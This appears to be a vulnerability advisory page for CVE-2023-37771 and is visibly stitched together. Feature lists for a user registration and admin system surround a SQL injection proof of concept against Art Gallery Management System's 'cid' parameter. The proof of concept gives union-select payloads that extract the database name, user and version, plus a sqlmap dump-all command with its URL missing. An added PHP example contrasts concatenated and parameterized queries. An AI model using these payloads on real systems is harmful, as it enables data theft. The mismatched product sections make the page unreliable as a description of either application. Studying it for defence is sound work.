CVE-2023-37771 User Registration & Login and User Management System

User Module

In the user module, users can register themselves. After registration, a user can log in with their own email ID and password.
If a user forgets their password, they can request it using their own email ID.

User Registration
User Login
Forgot Password

Note: For Forgot Password, you have to provide your Gmail credentials in password-recovery.php. After that, the email function will work on your localhost.

Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php.

Configurations :


Steps to Reproduce:

1. Go to Sculptures through the "ART TYPE" option in the navigation bar.

2. On this page, insert a single quote into the "cid" parameter to break the query; this shows that the "cid" parameter is vulnerable to SQL injection.
   '&&artname=Sculptures

3. Now join the query.
   '--+&&artname=Sculptures

4. Now run an "order by" query to find the number of columns.
   ' order by 6 --+&&artname=Sculptures

5. Now, by inserting the payloads in the "cid" parameter, we get the username, database, and database version.
   ' union all select 1,2,3,database(),5,6 --+&&artname=Sculptures
   ' union all select 1,2,3,current_user(),5,6 --+&&artname=Sculptures
   ' union all select 1,2,3,version(),5,6 --+&&artname=Sculptures

6. Now dump all the databases by using sqlmap:

 sqlmap -u --dump-all --batch
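
The behaviour in these steps is what a query built by pasting "cid" into the SQL text produces. The following is an added example, not code from the application: it assumes an in-memory SQLite database reached through PDO, with hypothetical table, column and function names, and runs a concatenated query beside a validated, parameterized one on constructed inputs shaped like those above.

```php
<?php
// Added example: table, column and function names are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE art_product (id INTEGER, title TEXT, artist TEXT,
            medium TEXT, price INTEGER, art_type INTEGER)');
$pdo->exec("INSERT INTO art_product VALUES
            (1, 'Bronze Horse', 'A. Rao', 'bronze', 900, 1),
            (2, 'Harbour at Dusk', 'L. Chen', 'oil', 450, 2)");

// Vulnerable pattern: the request value is pasted into the SQL text, so a
// quote in cid ends the string literal and the rest is parsed as SQL.
function products_vulnerable(PDO $pdo, string $cid): array
{
    $sql = "SELECT * FROM art_product WHERE art_type = '$cid'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: cid must be a positive integer, and it reaches the database only
// as a bound parameter, never as part of the SQL text.
function products_hardened(PDO $pdo, string $cid): array
{
    $id = filter_var($cid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];   // reject anything that is not a plain category id
    }
    $stmt = $pdo->prepare('SELECT * FROM art_product WHERE art_type = :cid');
    $stmt->bindValue(':cid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed inputs: a normal id, a lone quote, and a six-column union.
$inputs = ['1', "'", "' union all select 1,2,3,4,5,6 -- "];
foreach ($inputs as $cid) {
    try {
        $v = count(products_vulnerable($pdo, $cid)) . ' row(s)';
    } catch (PDOException $e) {
        $v = 'SQL error';   // the broken query seen in step 2
    }
    $h = count(products_hardened($pdo, $cid)) . ' row(s)';
    printf("cid=%-40s vulnerable: %-10s hardened: %s\n", json_encode($cid), $v, $h);
}
```

With the concatenated query the lone quote raises a SQL error and the union input returns a row that is not in the table; the hardened function returns no rows for either input.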

Admin Panel

The admin can manage all registered users, update user information, and delete users.
The admin can also change their own password.

Admin Login
Manage users
Edit user information
Change Password(admin)
